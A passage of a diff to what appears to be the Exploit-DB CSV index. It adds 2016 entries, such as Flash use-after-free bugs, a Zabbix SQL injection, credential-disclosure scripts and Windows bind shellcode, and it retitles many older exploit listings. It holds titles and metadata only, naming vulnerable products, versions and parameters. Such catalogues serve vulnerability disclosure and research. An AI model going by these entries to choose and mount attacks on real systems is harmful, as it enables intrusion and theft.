Bypass",2007-10-11,MustLive,cgi,webapps,0 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - Content Management System main.php SQL Injection",2007-10-11,durito,php,webapps,0 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - Merchant shop.php SQL Injection",2007-10-11,durito,php,webapps,0 @@ -28144,6 +28144,7 @@ id,file,description,date,author,platform,type,port 31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31246,platforms/php/webapps/31246.txt,"Joomla! and Mambo com_genealogy Component - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +40356,platforms/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",multiple,dos,0 31247,platforms/php/webapps/31247.txt,"iJoomla com_magazine Component - 'pageid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 @@ -28175,6 +28176,7 @@ id,file,description,date,author,platform,type,port 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 +40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0 31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 @@ -28278,7 +28280,7 @@ id,file,description,date,author,platform,type,port 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 -31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI redirection",2008-04-23,"Richard Brain",windows,remote,0 +31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection",2008-04-23,"Richard Brain",windows,remote,0 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 @@ -28362,6 +28364,7 @@ id,file,description,date,author,platform,type,port 31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 - controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 - controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +40354,platforms/android/remote/40354.txt,"Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0 31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 @@ -28427,6 +28430,7 @@ id,file,description,date,author,platform,type,port 31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0 +40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 @@ -28702,7 +28706,7 @@ id,file,description,date,author,platform,type,port 31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 +31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 @@ -28757,6 +28761,7 @@ id,file,description,date,author,platform,type,port 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +40350,platforms/windows/local/40350.py,"Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0 31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 @@ -28818,6 +28823,7 @@ id,file,description,date,author,platform,type,port 31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0 31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 +40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 @@ -28893,7 +28899,7 @@ id,file,description,date,author,platform,type,port 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 -32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload",2014-03-03,"Christian Catalano",php,webapps,0 +32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",php,webapps,0 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0 @@ -29295,7 +29301,7 @@ id,file,description,date,author,platform,type,port 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 -32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorization",2014-03-26,Metasploit,linux,remote,443 +32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorisation",2014-03-26,Metasploit,linux,remote,443 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i Parameter) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 @@ -30100,7 +30106,7 @@ id,file,description,date,author,platform,type,port 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 33365,platforms/php/webapps/33365.txt,"WordPress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 -40345,platforms/php/webapps/40345.txt,"Freepbx 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0 +40345,platforms/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 33367,platforms/php/webapps/33367.txt,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 33368,platforms/php/webapps/33368.html,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 @@ -30414,6 +30420,7 @@ id,file,description,date,author,platform,type,port 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps,0 40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0 33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps,0 +40351,platforms/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",php,webapps,80 33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component - 'id' Parameter SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component - 'maintree' Parameter Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0 @@ -30469,6 +30476,7 @@ id,file,description,date,author,platform,type,port 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 +40352,platforms/win_x86/shellcode/40352.c,"Windows x86 - Bind Shell TCP Shellcode",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 @@ -30631,7 +30639,7 @@ id,file,description,date,author,platform,type,port 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80 -33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 +33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload",2014-07-07,Metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 @@ -30742,8 +30750,8 @@ id,file,description,date,author,platform,type,port 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 -34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 -34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0 @@ -31412,7 +31420,7 @@ id,file,description,date,author,platform,type,port 34862,platforms/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection",2014-10-02,Metasploit,linux,remote,21 34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injections",2014-10-02,Portcullis,php,webapps,80 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 -34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 +34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authentication Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow",2014-10-02,Metasploit,linux,remote,7426 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 @@ -31635,7 +31643,7 @@ id,file,description,date,author,platform,type,port 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference",2014-10-28,Metasploit,windows,local,0 -35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 +35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 @@ -31682,7 +31690,7 @@ id,file,description,date,author,platform,type,port 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for E-Business - Directory Traversal",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 -35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authentication SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 +35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100 35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 @@ -31941,7 +31949,7 @@ id,file,description,date,author,platform,type,port 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 35440,platforms/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 -35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 +35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 @@ -32109,7 +32117,7 @@ id,file,description,date,author,platform,type,port 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"phpList 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 -35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Authentication SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 +35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0 35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0 35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 @@ -32134,7 +32142,7 @@ id,file,description,date,author,platform,type,port 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 -35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution",2014-12-30,drone,windows,remote,0 +35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 @@ -32315,7 +32323,7 @@ id,file,description,date,author,platform,type,port 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 -35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 +35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated Arbitrary File Upload",2015-01-20,Metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 @@ -32420,8 +32428,8 @@ id,file,description,date,author,platform,type,port 35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - includes/JavaScript.php action Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 -35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0 -35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0 +35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code 